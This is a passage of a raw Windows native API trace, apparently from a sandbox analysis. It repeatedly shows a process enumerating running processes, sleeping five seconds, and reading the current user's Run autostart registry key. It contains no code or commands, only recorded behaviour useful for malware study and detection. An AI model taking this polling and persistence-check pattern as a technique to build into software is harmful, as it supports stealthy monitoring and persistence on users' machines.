RegionSize=0x14e624*=0x20000) returned 0x0 [0188.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.733] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.745] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.745] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.746] NtClose (Handle=0xec) returned 0x0 [0188.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.747] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.749] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.760] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.760] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.760] NtClose (Handle=0xec) returned 0x0 [0188.761] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.761] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.762] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.764] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.776] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.776] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.776] NtClose (Handle=0xec) returned 0x0 [0188.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.777] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.780] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.792] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.792] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.792] NtClose (Handle=0xec) returned 0x0 [0188.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.795] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.807] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.807] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.807] NtClose (Handle=0xec) returned 0x0 [0188.807] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.811] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.823] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.823] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.823] NtClose (Handle=0xec) returned 0x0 [0188.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.827] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.838] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.838] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.838] NtClose (Handle=0xec) returned 0x0 [0188.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.839] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.843] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.855] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.855] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.855] NtClose (Handle=0xec) returned 0x0 [0188.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.856] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.859] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.859] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.869] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.870] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.870] NtClose (Handle=0xec) returned 0x0 [0188.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.870] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.873] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.886] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.886] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.886] NtClose (Handle=0xec) returned 0x0 [0188.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.887] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.890] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.901] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.901] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.901] NtClose (Handle=0xec) returned 0x0 [0188.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.902] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.905] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.917] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.917] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.917] NtClose (Handle=0xec) returned 0x0 [0188.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.921] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.932] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.932] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.932] NtClose (Handle=0xec) returned 0x0 [0188.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.936] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.949] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.949] NtEnumerateValueKey (in: 